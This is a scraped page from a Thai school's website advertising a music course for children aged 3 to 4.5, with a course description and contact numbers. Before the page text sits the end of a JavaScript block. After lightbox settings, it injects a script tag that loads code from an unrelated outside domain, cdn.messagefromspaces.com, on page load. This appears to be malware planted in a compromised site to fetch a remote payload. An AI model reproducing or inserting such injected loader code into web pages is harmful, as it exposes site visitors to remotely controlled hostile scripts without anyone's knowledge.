, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

โรงเรียนรับขวัญ

ดนตรีเด็กเล็ก สำหรับเด็ก อายุ 3 ? 4.5 ปี

ดนตรีเด็กเล็ก สำหรับเด็ก อายุ 3 ? 4.5 ปี

หลักสูตรนี้จะช่วยปูพื้นฐานทักษะทางดนตรีให้กับเด็ก โดยใช้บทเพลงนิทานเป็นสื่อในการเรียนรู้ โดยกิจกรรมการเรียนจะเน้นให้เด็กๆ เรียนรู้และพัฒนาทักษะทางการฟัง, การร้อง, จังหวะ, การเคลื่อนไหว, การโต้ตอบ อีกทั้งเรียนรู้การใช้เครื่องดนตรีประกอบจังหวะ เด็กๆ จะสนุกสนานกับการเรียนพื้นฐานทางดนตรีเพื่อทักษะที่ดีสำหรับการเรียนในระดับต่อไป

สนใจติดต่อ โทร. 02.440.0789 - 90 หรือ 083.003.4340